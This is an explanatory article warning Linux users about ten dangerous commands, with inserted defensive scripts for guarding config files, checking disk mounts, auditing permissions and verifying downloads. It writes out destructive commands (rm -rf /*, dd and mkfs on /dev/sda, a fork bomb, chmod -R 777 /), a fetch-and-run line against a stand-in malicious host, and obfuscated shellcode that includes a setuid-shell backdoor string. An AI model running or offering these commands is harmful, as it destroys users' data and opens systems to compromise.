What are the most dangerous Linux commands?
Many people have asked me this question countless times, and I have always avoided answering because there is no definitive list of dangerous Linux commands.
The tools you have allow you to control and modify every aspect of your operating system. I don’t mean to scare you, but if you are not familiar with these commands and tools, you can easily destroy your system.
Imagine the scenario of a small child at home. The child has many ways to hurt themselves. But does that mean we shouldn’t let the child out of the crib? That would hinder her growth.
This is where parents set boundaries and guide their children. Don’t go near the fire, don’t poke your fingers into the electrical outlets… As the child grows and gains experience, she can turn on the stove, start a fire in the fireplace, and plug in the power cord.
Similarly, if you know some known risky commands, you might avoid falling into the traps of trolls who try to trick you into running commands that disrupt your system.
As you gain experience and understand the meanings and usages of these commands and tools, the chances of destroying your system with foolish and tricky commands will decrease.
My colleague Sreenath has compiled a list of popular dangerous Linux commands. Let’s take a look at how they can take down your Linux system.
Disclaimer: Do not attempt any of the commands mentioned in this article if you do not know what you are doing, or you will bear the consequences.
1. rm -rf /*
This is possibly the most notorious command circulating on various social media. You will often find trolls mentioning this in various discussions.
The rm command is used to delete files/directories. The flags -r and -f indicate that it will recursively delete all files within the specified directory. Now, if you don’t have root privileges, this command won’t cause any harm.
Running sudo rm -rf / will also not cause any problems because most distributions provide a fail-safe option. You need to specify --no-preserve-root to actually run it.
sudo rm -rf / --no-preserve-root
However, a simpler version could be:
sudo rm -rf /*
This will start recursively deleting all files under the root directory, and after a while, your system will freeze and display “error deleting files.” Once restarted, you will be sent to the grub-rescue prompt.
2. Overwrite Your Partition
If you are familiar with file systems, you might know what /dev/sda is. It (usually) refers to your disk drive partition. The > operator is used to write the output of the command before it to the specified location.
Once you run any command and write it to /dev/sda, for example:
echo "Hello" > /dev/sda
This will replace your partition, which contains all the data required to boot the system, with the string Hello.
3. Move Everything to the Black Hole
Every Linux system has a black hole. And that black hole is /dev/null.
Whatever you throw into this area will be lost forever. Moreover, it reports the write process as successful after discarding data, which is its main reason for being destructive.
mv /home/user/* /dev/null
The mv command is used to move or rename files/directories. In the command above, you moved all files in your home directory to the black hole. While the root system is not destroyed, all your personal data will be lost.
4. Format Your Hard Drive
mkfs is a command-line tool used to format disks and partitions. It is a super handy tool for creating partitions for installed operating systems. But the same command can also format your hard drive. Formatting your drive means deleting all files necessary for the system to boot.
mkfs.ext3 /dev/sda
This command does its job, and you end up with an irrecoverably messy system.
5. Fork Bomb
This cute-looking random combination of special characters and symbols is enough to freeze a running system by exhausting system resources.
:(){ :|:& };:
& – Shell background operator. It tells the shell to place the command in the background. Here, it defines a function called : that calls itself twice, once in the foreground and once in the background. This process repeats continuously until the system freezes.
As the name suggests, it forks itself, ultimately becoming a chain bomb that consumes all system resources. You will be forced to restart the system, which is not as bad as the other commands on this list.
6. Overwrite Important Configuration Files
While this is not a command per se, it is more of a preventive measure.
As mentioned earlier, the > operator is used to write to files. It discards what is already in the file and writes new data into it.
command > config_filename
Now, if you use some important configuration files as places to write data, they will be replaced, leaving a corrupted system.
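As a preventive measure for the case above, the following script is an added example and not part of the original article. It shows the shell's noclobber option (set -C) stopping > from truncating an existing file, plus a deliberate-replace helper that buffers the new content first and keeps a backup; the function names and the demo file are constructed for illustration.

```sh
#!/bin/sh
# Added example: keep `command > config_filename` from destroying a config.

# guarded_write FILE
# Copies stdin to FILE with noclobber (set -C) active in a subshell, so the
# redirection fails instead of truncating a file that already exists.
guarded_write() {
    ( set -C; cat > "$1" ) 2>/dev/null
}

# replace_config FILE
# Intentional replacement: buffer stdin first, refuse empty output (a failed
# generator would otherwise leave a zero-byte config), and keep FILE.bak.
replace_config() {
    tmp=$(mktemp) || return 1
    cat > "$tmp"
    if [ ! -s "$tmp" ]; then
        rm -f "$tmp"
        echo "no new content, $1 left untouched" >&2
        return 1
    fi
    if [ -e "$1" ]; then cp -p "$1" "$1.bak"; fi
    cat "$tmp" > "$1" && rm -f "$tmp"
}

# Constructed demo file standing in for a real configuration file.
cfg=$(mktemp -d)/sshd_config.example
printf 'PermitRootLogin no\n' > "$cfg"

echo "oops" | guarded_write "$cfg" || echo "guarded_write: existing file kept"
true | replace_config "$cfg" || echo "replace_config: empty output rejected"
printf 'PermitRootLogin no\nPasswordAuthentication no\n' | replace_config "$cfg"
cat "$cfg"
```

With set -C active in an interactive shell, an intentional overwrite is still possible with the >| operator.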
7. Replace Partitions with Garbage Data
/dev/random is a command in Linux that can create garbage data. Combine it with the dd command and your partition, and you get a firebomb that can set your partition ablaze.
dd if=/dev/random of=/dev/sda
The dd command is used as a low-level copying tool. Here, it takes random data from /dev/random and replaces the /dev/sda partition with this garbage.
A similar effect can be achieved by:
cat /dev/urandom > filename
Here, it takes garbage data from /dev/urandom (Note: On Linux, /dev/urandom is now equivalent to /dev/random) and fills a file with it. If you do not terminate it using Ctrl + C, the file will occupy a considerable amount of space, which can be disastrous for low-end systems.
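Sections 2, 4 and 7 all come down to a write aimed at a disk that is in use. The script below is an added example, not part of the original article: it checks a mount table for the target device and its partitions before anything is written. The function names and the sample mount table are constructed for illustration.

```sh
#!/bin/sh
# Added example: check whether a disk is in use before dd, mkfs or > touch it.

# mounted_on DEVICE [MOUNTS_FILE]
# Prints "source mountpoint" for each mounted filesystem on DEVICE itself or on
# one of its partitions (sda -> sda1, nvme0n1 -> nvme0n1p2).
# MOUNTS_FILE defaults to /proc/mounts; the demo passes a constructed file.
mounted_on() {
    awk -v dev="$1" '
        $1 == dev { print $1, $2; next }
        index($1, dev) == 1 {
            rest = substr($1, length(dev) + 1)
            if (rest ~ /^p?[0-9]+$/) print $1, $2
        }' "${2:-/proc/mounts}"
}

# safe_to_overwrite DEVICE [MOUNTS_FILE]
# Returns 0 only when nothing on DEVICE is mounted; otherwise lists the mounts.
safe_to_overwrite() {
    hits=$(mounted_on "$1" "${2:-/proc/mounts}")
    if [ -n "$hits" ]; then
        echo "refusing: $1 is in use" >&2
        echo "$hits" | sed 's/^/  /' >&2
        return 1
    fi
    return 0
}

# Constructed mount table (same column layout as /proc/mounts).
sample=$(mktemp)
cat > "$sample" <<'EOF'
/dev/sda1 /boot ext4 rw,relatime 0 0
/dev/sda2 / ext4 rw,relatime 0 0
/dev/sdb1 /mnt/usb vfat rw 0 0
tmpfs /run tmpfs rw,nosuid 0 0
EOF

safe_to_overwrite /dev/sda "$sample" || echo "/dev/sda: blocked"
safe_to_overwrite /dev/sdc "$sample" && echo "/dev/sdc: nothing mounted"
```

The check only sees plain mounts; swap, LVM and device-mapper volumes sitting on the disk do not appear this way, so confirm the target with lsblk as well.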
8. Expose Your System to Everyone
In Linux, everything is a file, and every file has certain permissions.
You can check permissions using ls -l. The root file system does not allow access to other users without permissions. While this ensures the privacy and security of the system, you can overturn this system with one command.
chmod -R 777 /
The above command exposes all files on the root partition to everyone. This means every user on the system has read, write, and execute permissions. This is detrimental to your system.
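To find out how far permissions like these have spread, the following script (an added example, not part of the original article) lists everything under a directory that any user may write to. The function names and the test tree are constructed for illustration; skipping sticky directories is a choice made here because mode 1777 is the normal mode of /tmp.

```sh
#!/bin/sh
# Added example: find what a careless chmod left writable by everyone.

# list_world_writable DIR
# Prints files and directories under DIR with the "other" write bit set.
# Directories with the sticky bit (mode 1777, like /tmp) are skipped because
# that is their intended mode. Symlinks are not followed, and -xdev keeps the
# walk on one filesystem so /proc and network mounts are left alone.
list_world_writable() {
    find "$1" -xdev \( -type f -o -type d \) -perm -0002 ! -perm -1000 -print \
        2>/dev/null | sort
}

# audit_world_writable DIR
# Returns 0 when nothing is world-writable, 1 otherwise (findings on stdout).
audit_world_writable() {
    findings=$(list_world_writable "$1")
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Constructed test tree standing in for a real filesystem.
tree=$(mktemp -d)
mkdir "$tree/etc" "$tree/tmp"
: > "$tree/etc/app.conf";   chmod 644 "$tree/etc/app.conf"
: > "$tree/etc/leaky.conf"; chmod 666 "$tree/etc/leaky.conf"
chmod 1777 "$tree/tmp"      # sticky and world-writable, as /tmp normally is

audit_world_writable "$tree" || echo "world-writable entries found"
```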
9. Download and Run Malicious Content
How do you install software on Linux? You can use the official package manager or ready-to-use packages such as Deb/RPM, Snap, Flatpak, etc.
However, some software is not packaged, and their developers provide shell scripts for download and execution. Take Homebrew as an example:
You download a shell file and run it as root, installing software on your system. Do you see the problem?
While it works for official software like Homebrew, you should carefully check the contents of the shell script you downloaded before running it directly like below:
wget http://malicious_source -O- | sh
This kind of command downloads and runs malicious scripts on your system, which could compromise your system’s security.
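The safer pattern is to save the script to a file, check it, and only then run it. The script below is an added example, not part of the original article: it runs a downloaded file only when its SHA-256 matches a value obtained from the publisher. It assumes the GNU coreutils sha256sum tool; the function name and the stand-in installer are constructed for illustration.

```sh
#!/bin/sh
# Added example: save, verify, then run. Nothing is piped straight into sh.

# verify_then_run FILE EXPECTED_SHA256
# Runs FILE with sh only if its SHA-256 matches the pinned value.
# Returns 2 if FILE is missing, 1 on a checksum mismatch.
verify_then_run() {
    file=$1
    expected=$2
    if [ ! -f "$file" ]; then
        echo "no such file: $file" >&2
        return 2
    fi
    actual=$(sha256sum "$file" | awk '{print $1}')
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $file: refusing to run" >&2
        return 1
    fi
    sh "$file"
}

# Constructed stand-in for a downloaded installer. In real use the file comes
# from something like: wget <url> -O install.sh  (then read it in a pager).
demo_dir=$(mktemp -d)
printf 'echo "installer ran"\n' > "$demo_dir/install.sh"

# In real use this value is copied from the publisher's release page, not
# computed from the download itself; it is computed here only for the demo.
pinned=$(sha256sum "$demo_dir/install.sh" | awk '{print $1}')

verify_then_run "$demo_dir/install.sh" "$pinned"

# Simulate the file changing after the checksum was published.
printf 'echo "extra line"\n' >> "$demo_dir/install.sh"
verify_then_run "$demo_dir/install.sh" "$pinned" || echo "blocked"
```

A matching checksum only proves the file is the one the publisher listed; reading the script before running it is still what tells you what it does.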
10. Obfuscated Commands
In the Linux terminal, there are many ways to run commands. One way is through hexadecimal-encoded commands:
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
While it looks fancy, this is an encoded version of the rm -rf command. It has the same effect as running the previous command. Therefore, be cautious when copying and pasting these fancy commands from the internet.
Summary
There is a famous computer term PEBKAC: “The problem exists between keyboard and chair”.
Because ultimately, it’s up to the user (you) to ensure that you do not destroy your system by blindly running any dangerous commands.
UNIX’s job is not to prevent you from lifting a rock and dropping it on your own foot. If you choose to do so, then UNIX’s job is to smash your foot with the rock in the most efficient way it knows.
This saying applies equally to Linux. You have complete control over your operating system. What you choose to do is entirely up to you.
I recommend doing the following to ensure a safer experience.
As I said, there is no fixed list of dangerous Linux commands. There are many more that could be added to this list, and there is no end to it.
I hope this gives you some tips on what you should not do to keep Linux secure.